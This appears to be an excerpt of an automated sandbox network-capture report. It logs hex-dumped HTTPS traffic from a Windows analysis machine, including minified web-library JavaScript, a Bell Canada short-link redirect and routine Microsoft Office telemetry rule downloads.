                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:12 UTC8192INData Raw: 70 6c 79 28 6e 75 6c 6c 2c 61 5b 68 5d 2e 6d 61 74 63 68 65 73 29 2c 63 5b 4d 5d 29 7b 66 6f 72 28 64 3d 2b 2b 68 3b 65 3e 64 26 26 21 76 2e 72 65 6c 61 74 69 76 65 5b 61 5b 64 5d 2e 74 79 70 65 5d 3b 64 2b 2b 29 3b 72 65 74 75 72 6e 20 71 28 68 3e 31 26 26 6e 28 6b 29 2c 68 3e 31 26 26 6c 28 61 2e 73 6c 69 63 65 28 30 2c 68 2d 31 29 2e 63 6f 6e 63 61 74 28 7b 76 61 6c 75 65 3a 22 20 22 3d 3d 3d 61 5b 68 2d 32 5d 2e 74 79 70 65 3f 22 2a 22 3a 22 22 7d 29 29 2e 72 65 70 6c 61 63 65 28 67 61 2c 22 24 31 22 29 2c 63 2c 64 3e 68 26 26 72 28 61 2e 73 6c 69 63 65 28 68 2c 64 29 29 2c 65 3e 64 26 26 72 28 61 3d 61 2e 73 6c 69 63 65 28 64 29 29 2c 65 3e 64 26 26 6c 28 61 29 29 7d 6b 2e 70 75 73 68 28 63 29 7d 72 65 74 75 72 6e 20 6e 28 6b 29 7d 66 75 6e 63 74 69
                                                                                                                                                                                                                                                                                                                                      Data Ascii: ply(null,a[h].matches),c[M]){for(d=++h;e>d&&!v.relative[a[d].type];d++);return q(h>1&&n(k),h>1&&l(a.slice(0,h-1).concat({value:" "===a[h-2].type?"*":""})).replace(ga,"$1"),c,d>h&&r(a.slice(h,d)),e>d&&r(a=a.slice(d)),e>d&&l(a))}k.push(c)}return n(k)}functi
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:12 UTC8192INData Raw: 77 65 72 43 61 73 65 28 29 2c 22 6e 74 68 22 3d 3d 3d 62 5b 31 5d 2e 73 6c 69 63 65 28 30 2c 33 29 3f 28 62 5b 33 5d 7c 7c 61 2e 65 72 72 6f 72 28 62 5b 30 5d 29 2c 62 5b 34 5d 3d 2b 28 62 5b 34 5d 3f 62 5b 35 5d 2b 28 62 5b 36 5d 7c 7c 31 29 3a 32 2a 28 22 65 76 65 6e 22 3d 3d 3d 62 5b 33 5d 7c 7c 22 6f 64 64 22 3d 3d 3d 62 5b 33 5d 29 29 2c 62 5b 35 5d 3d 2b 28 62 5b 37 5d 2b 62 5b 38 5d 7c 7c 22 6f 64 64 22 3d 3d 3d 62 5b 33 5d 29 29 3a 62 5b 33 5d 26 26 61 2e 65 72 72 6f 72 28 62 5b 30 5d 29 2c 62 7d 2c 50 53 45 55 44 4f 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 2c 63 3d 21 61 5b 36 5d 26 26 61 5b 32 5d 3b 72 65 74 75 72 6e 20 6d 61 2e 43 48 49 4c 44 2e 74 65 73 74 28 61 5b 30 5d 29 3f 6e 75 6c 6c 3a 28 61 5b 33 5d 3f 61 5b 32 5d 3d 61 5b
                                                                                                                                                                                                                                                                                                                                      Data Ascii: werCase(),"nth"===b[1].slice(0,3)?(b[3]||a.error(b[0]),b[4]=+(b[4]?b[5]+(b[6]||1):2*("even"===b[3]||"odd"===b[3])),b[5]=+(b[7]+b[8]||"odd"===b[3])):b[3]&&a.error(b[0]),b},PSEUDO:function(a){var b,c=!a[6]&&a[2];return ma.CHILD.test(a[0])?null:(a[3]?a[2]=a[
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:12 UTC8192INData Raw: 3d 64 2e 6c 65 6e 67 74 68 2c 68 3d 4d 61 74 68 2e 63 65 69 6c 28 28 66 2b 67 29 2f 32 29 2c 69 3d 68 2c 6a 3d 32 2a 68 2c 6b 3d 6e 65 77 20 41 72 72 61 79 28 6a 29 2c 6c 3d 6e 65 77 20 41 72 72 61 79 28 6a 29 2c 6d 3d 30 3b 6a 3e 6d 3b 6d 2b 2b 29 6b 5b 6d 5d 3d 2d 31 2c 6c 5b 6d 5d 3d 2d 31 3b 6b 5b 69 2b 31 5d 3d 30 2c 6c 5b 69 2b 31 5d 3d 30 3b 66 6f 72 28 76 61 72 20 6e 3d 66 2d 67 2c 6f 3d 6e 25 32 21 3d 30 2c 70 3d 30 2c 71 3d 30 2c 72 3d 30 2c 73 3d 30 2c 74 3d 30 3b 68 3e 74 26 26 21 28 28 6e 65 77 20 44 61 74 65 29 2e 67 65 74 54 69 6d 65 28 29 3e 65 29 3b 74 2b 2b 29 7b 66 6f 72 28 76 61 72 20 75 3d 2d 74 2b 70 3b 74 2d 71 3e 3d 75 3b 75 2b 3d 32 29 7b 76 61 72 20 76 2c 77 3d 69 2b 75 3b 76 3d 75 3d 3d 2d 74 7c 7c 75 21 3d 74 26 26 6b 5b 77 2d
                                                                                                                                                                                                                                                                                                                                      Data Ascii: =d.length,h=Math.ceil((f+g)/2),i=h,j=2*h,k=new Array(j),l=new Array(j),m=0;j>m;m++)k[m]=-1,l[m]=-1;k[i+1]=0,l[i+1]=0;for(var n=f-g,o=n%2!=0,p=0,q=0,r=0,s=0,t=0;h>t&&!((new Date).getTime()>e);t++){for(var u=-t+p;t-q>=u;u+=2){var v,w=i+u;v=u==-t||u!=t&&k[w-
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:12 UTC8192INData Raw: 3f 29 28 2e 2b 3f 29 5c 31 5c 5d 29 7c 28 3f 3a 5c 2e 3f 28 5b 5e 2e 5c 6e 5c 5b 5c 5d 5d 2b 29 5c 2e 3f 29 2f 67 2c 57 62 3d 2f 5e 64 61 74 61 4c 61 79 65 72 5c 5b 20 2a 5b 30 2d 39 5d 2b 20 2a 5c 5d 2f 3b 21 66 75 6e 63 74 69 6f 6e 28 61 29 7b 66 75 6e 63 74 69 6f 6e 20 62 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 76 6f 69 64 20 30 21 3d 3d 61 26 26 6e 75 6c 6c 21 3d 3d 61 3f 67 28 63 28 61 2c 62 29 29 3a 62 7d 66 75 6e 63 74 69 6f 6e 20 63 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 6a 2e 64 69 66 66 5f 6d 61 69 6e 28 61 2c 62 29 7d 66 75 6e 63 74 69 6f 6e 20 64 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 62 26 26 28 61 3d 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 62 3f 62 3a 66 28 61 2c 62 29 29 2c 61 7d 66 75 6e 63 74 69 6f 6e 20 65 28 61 29 7b 66 6f 72
                                                                                                                                                                                                                                                                                                                                      Data Ascii: ?)(.+?)\1\])|(?:\.?([^.\n\[\]]+)\.?)/g,Wb=/^dataLayer\[ *[0-9]+ *\]/;!function(a){function b(a,b){return void 0!==a&&null!==a?g(c(a,b)):b}function c(a,b){return j.diff_main(a,b)}function d(a,b){return b&&(a="string"==typeof b?b:f(a,b)),a}function e(a){for
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:12 UTC8192INData Raw: 2c 74 68 69 73 2e 72 65 70 6c 61 79 4d 65 74 68 6f 64 3d 6f 63 2e 52 41 4e 44 4f 4d 2c 74 68 69 73 2e 72 65 70 6c 61 79 53 65 73 73 69 6f 6e 3d 6c 63 2e 53 45 52 56 45 52 2c 74 68 69 73 2e 72 65 70 6c 61 79 4c 65 61 64 3d 6c 63 2e 53 45 52 56 45 52 2c 54 28 70 63 2c 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 74 68 69 73 5b 62 5d 3d 56 28 61 29 7c 7c 30 7d 2c 74 68 69 73 29 2c 74 68 69 73 2e 73 75 62 73 63 72 69 70 74 69 6f 6e 54 79 70 65 7c 7c 28 74 68 69 73 2e 73 75 62 73 63 72 69 70 74 69 6f 6e 54 79 70 65 3d 6d 63 2e 44 41 54 41 5f 43 52 45 44 49 54 29 2c 74 68 69 73 2e 65 78 70 65 72 69 65 6e 63 65 4d 65 74 68 6f 64 3d 3d 3d 6f 63 2e 50 52 45 5f 4d 49 47 52 41 54 45 44 26 26 28 74 68 69 73 2e 73 75 62 73 63 72 69 70 74 69 6f 6e 54 79 70 65 3d 6d 63 2e
                                                                                                                                                                                                                                                                                                                                      Data Ascii: ,this.replayMethod=oc.RANDOM,this.replaySession=lc.SERVER,this.replayLead=lc.SERVER,T(pc,function(a,b){this[b]=V(a)||0},this),this.subscriptionType||(this.subscriptionType=mc.DATA_CREDIT),this.experienceMethod===oc.PRE_MIGRATED&&(this.subscriptionType=mc.
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:12 UTC8192INData Raw: 6f 63 65 73 73 43 73 73 46 6e 28 61 2e 65 6c 29 2c 62 63 2e 69 73 45 6d 70 74 79 28 62 29 3f 61 2e 6e 61 3d 4a 63 3a 28 64 65 6c 65 74 65 20 61 2e 6e 61 2c 62 2e 74 6f 6f 4c 61 72 67 65 26 26 28 62 63 2e 6c 73 74 79 6c 65 3d 21 30 29 2c 62 2e 68 72 65 66 3f 28 61 2e 6e 61 3d 22 4c 49 4e 4b 22 2c 63 2e 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 2c 63 2e 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 2c 63 2e 68 72 65 66 3d 62 2e 68 72 65 66 2c 62 2e 6d 65 64 69 61 26 26 28 63 2e 6d 65 64 69 61 3d 62 2e 6d 65 64 69 61 29 2c 64 65 6c 65 74 65 20 63 2e 64 69 73 61 62 6c 65 64 29 3a 28 61 2e 68 3d 62 2e 63 6f 6e 74 65 6e 74 2c 61 2e 6e 61 3d 22 53 54 59 4c 45 22 2c 64 65 6c 65 74 65 20 63 2e 74 79 70 65 2c 64 65 6c 65 74 65 20 63 2e 72 65 6c 2c 64 65 6c 65
                                                                                                                                                                                                                                                                                                                                      Data Ascii: ocessCssFn(a.el),bc.isEmpty(b)?a.na=Jc:(delete a.na,b.tooLarge&&(bc.lstyle=!0),b.href?(a.na="LINK",c.type="text/css",c.rel="stylesheet",c.href=b.href,b.media&&(c.media=b.media),delete c.disabled):(a.h=b.content,a.na="STYLE",delete c.type,delete c.rel,dele


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                      130192.168.2.94992718.239.18.884433100C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:12 UTC758OUTGET /9hb8rBafRwb?_p=c11334dc9a0760eee0188ee3efb2 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Host: bell.app.link
                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                      Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-User: ?1
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                                                                                                                      sec-ch-ua-model: ""
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:13 UTC1035INHTTP/1.1 307 Temporary Redirect
                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Server: openresty
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:12:12 GMT
                                                                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Platform-Version,Sec-CH-UA-Model
                                                                                                                                                                                                                                                                                                                                      Set-Cookie: _s=bSIHRGqn9rL3nJ2hRxT4ssO5k%2FFjfBiEcV6oWbASilINqVOmeni4p8hvKqSbWcOb; Max-Age=31536000; Domain=.app.link; Path=/; Expires=Fri, 31 Oct 2025 13:12:12 GMT; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Thu, 31 Oct 2024 13:12:12 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Security-Policy: frame-ancestors 'self'
                                                                                                                                                                                                                                                                                                                                      Location: https://support.bell.ca/Mobility/Self_Serve_options/Bell-Self-serve-app?_branch_match_id=1380522052703713689&_branch_referrer=H4sIAAAAAAAAA8soKSkottLXz9VLSs3J0UtO1E9PLUksKMjJT8%2FMK0hMT7WvK0pNSy0qysxLj08qyi8vTi2ydc4oys9NBQBn1J6hOwAAAA%3D%3D#EXT=MOB_URL_branch_getapploginpage_012423_MH
                                                                                                                                                                                                                                                                                                                                      X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                                                                                      Via: 1.1 0bdea9339f79fea2216fd97b3f7856f2.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS58-P6
                                                                                                                                                                                                                                                                                                                                      X-Amz-Cf-Id: GPPPIAhmmIA9kcNgRKt8xbsdbWd1_TYnkJZyryVyDjVhSuazb-_ktw==
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      131192.168.2.94993113.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:13 UTC192OUTGET /rules/rule701151v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:13 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:12:13 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 1401
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BE055B528"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: d0af8e75-601e-0050-7953-272c9c000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131213Z-17c5cb586f6p5pndayxh2uxv54000000015000000000b04z
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:13 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      132192.168.2.94993013.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:13 UTC192OUTGET /rules/rule702950v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:13 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:12:13 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 1368
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BDDC22447"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: df5d8003-e01e-0099-48f7-26da8a000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131213Z-17c5cb586f62bgw58esgbu9hgw0000000280000000009p1u
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:13 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 72 61 6e 73 6c 61 74 6f 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      133192.168.2.94992813.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:13 UTC192OUTGET /rules/rule700050v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:13 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:12:13 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 1352
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BE9DEEE28"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 0bafd3b5-501e-0078-0673-2b06cf000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131213Z-15b8d89586f5s5nz3ffrgxn5ac0000000adg0000000012ph
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:13 UTC1352INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      134192.168.2.94993213.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:13 UTC192OUTGET /rules/rule701150v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:13 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:12:13 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 1364
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BE1223606"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: eff8debc-001e-0065-199c-270b73000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131213Z-16849878b78fkwcjkpn19c5dsn00000008eg00000000m1kf
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:13 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 6e 64 46 6f 6e 74 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      135192.168.2.94992913.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:13 UTC192OUTGET /rules/rule702951v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
